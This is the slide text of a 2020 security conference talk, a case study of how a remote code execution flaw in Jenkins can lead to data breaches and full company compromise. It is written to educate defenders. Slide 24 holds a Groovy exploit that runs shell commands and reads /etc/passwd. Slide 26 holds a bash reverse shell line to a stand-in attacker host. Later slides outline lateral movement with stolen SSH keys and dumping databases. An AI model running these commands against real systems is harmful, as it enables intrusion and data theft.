Aase study on supply chain attack-how an rce in jenkins leads to data breaches and whole company compromise - Adam jordan

1. Case Study on Supply Chain Attack
How an RCE in Jenkins leads to Data Breaches & Whole Company Compromise
Adam Jordan @_adamyordan
IDSECCONF 2020

2. IDSECCONF 2020
Agenda
1. Background
Data breaches scene in south-east asia
2. The Case Study
Analysis from attacker's perspective
3. Conclusion
Lessons learned and remediation technique

3. IDSECCONF 2020
whoami
Adam Jordan
Head of Group Security R&D at Sea, Singapore
Alumni Fasilkom Universitas Indonesia
Played lots of CTFs
Security research and bug bounty

4. IDSECCONF 2020
Leaked data sold on RaidForums (Black market)

5. IDSECCONF 2020
Leaked data sold on Black market

6. IDSECCONF 2020
Company fined for data breaches

7. IDSECCONF 2020
Data Breaches in South East Asia - 2019 & 2020
Filtered by service availability in Indonesia
2019
March Bukalapak 13M customer data leaked
August Grab 21k drivers & passengers data leaked
2020
May Tokopedia 91M customers data leaked
Bhinneka 1.2M customer data leaked
October Cermati 2.9M customer data leaked
Lazada Redmart 1.1M customer accounts leaked

8. IDSECCONF 2020
The Cause?
From official statements: most data are leaked from separated
internal system, not from their main database.

9. IDSECCONF 2020
The Point to Take
While many companies invested a lot in the security
of their external customer-facing products,
many are still not paying enough attention to the
security of their internal components.

10. IDSECCONF 2020
DevSecOps and SDLC in modern software engineering
● Software Engineering prioritizes speed
○ Use Continuous Integration for automation (Jenkins)
● DevSecOps is all about integrating security in all steps
within software development lifecycle (SDLC).
○ Developer writing codes
○ Codes committed to Repository
○ Codes build pipeline
○ Codes deployed to Production server

11. IDSECCONF 2020
The supply chain in Software Development Lifecycle
Developers
write Codes
Codes
committed
to Repo
Codes test
& build
Codes
deployed to
Production
Automated with CI/CD Pipeline

12. IDSECCONF 2020
DevSecOps, all about integrating security in all steps within SDLC
Developers
write Codes
Codes
committed
to Repo
Codes test
& build
Codes
deployed to
Production
Automated with CI/CD Pipeline

13. IDSECCONF 2020
Jenkins vuln stats
Jenkins are affected by many Vulnerabilities,
including RCE in recent years.
source: cvedetails.com

14. IDSECCONF 2020
The supply chain attack
Developers
write Codes
Codes
committed
to Repo
Codes test
& build
Codes
deployed to
Production
Automated with CI/CD Pipeline

15. IDSECCONF 2020
The supply chain attack
Developers
write Codes
Codes
committed
to Repo
Codes test
& build
Codes
deployed to
Production
Automated with CI/CD Pipeline

16. IDSECCONF 2020
Case Study: Onlineshop.com

17. IDSECCONF 2020
Attack Technique
RECON EXPLOIT POST-EXPLOIT

18. IDSECCONF 2020
Attack Technique
RECON EXPLOIT POST-EXPLOIT

19. IDSECCONF 2020
RECON: Discover Target
Use OSINT
● shodan
● amass
● etc.

20. IDSECCONF 2020
RECON: Discover Vulnerability
From the official
security advisory.
Changelogs and
bug patches.

21. IDSECCONF 2020
RECON: Discover Exploit

22. IDSECCONF 2020
Attack Technique
RECON EXPLOIT POST-EXPLOIT

23. IDSECCONF 2020
Vulnerability Analysis

24. IDSECCONF 2020
Crafting the Exploit
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
print new ProcBuilder("/bin/bash").withArgs("-c",
"cat /etc/passwd").run().getOutputString()

25. IDSECCONF 2020
Exploitation: Executing the exploit

26. IDSECCONF 2020
Exploitation: Reverse Shell
bash -i >& /dev/tcp/attacker.host/1337 0>&1

27. IDSECCONF 2020
Attack Technique
RECON EXPLOIT POST-EXPLOIT

28. IDSECCONF 2020
Post Exploitation
● Collateral Movement
Spread access to other servers using ssh keys stored in Jenkins
● Steal Source code
Using Jenkins access to code repository
● Defacements
Tamper the products delivered to the customers, using access to source code, git
pipeline, and access to production servers.
● Dump Database
Via collateral movements to production servers.

29. IDSECCONF 2020
Attack: The network diagram

30. IDSECCONF 2020
Attacker get access to Jenkins via RCE

31. IDSECCONF 2020
Collateral movement to Production servers

32. IDSECCONF 2020
Access Production Database (Data Breaches)

33. IDSECCONF 2020
Steal source code from internal Git repos

34. IDSECCONF 2020
Compromise other systems

35. IDSECCONF 2020
1. Have a good insight of your security threat landscape
2. Update all components regularly
3. Proper monitoring to all servers owned, e.g. use SIEM
4. Proper credential management
Remediation

36. IDSECCONF 2020
Lessons Learned and Conclusion
● As a CI/CD platform, compromised Jenkins may lead to
many collateral damage.
○ Supply chain attack, data breaches, source code leak
● Re-emphasize the importance of securing internal
components.
○ Companies and cybersecurity teams need to be aware that internal
components are also threat vectors to be considered.

37. IDSECCONF 2020
This presentation is only a high-level overview, and is very limited
(because of time and media constraints).
I personally encourage more security practitioners from Indonesia to
dive deeper into technical security research.

38. IDSECCONF 2020
Thank You
hacking is not all about compromising a system. It's more about how to find a way from point A to point B using
previously unconsidered method.
Contact me
twitter: @_adamyordan
linkedin: @adamyordan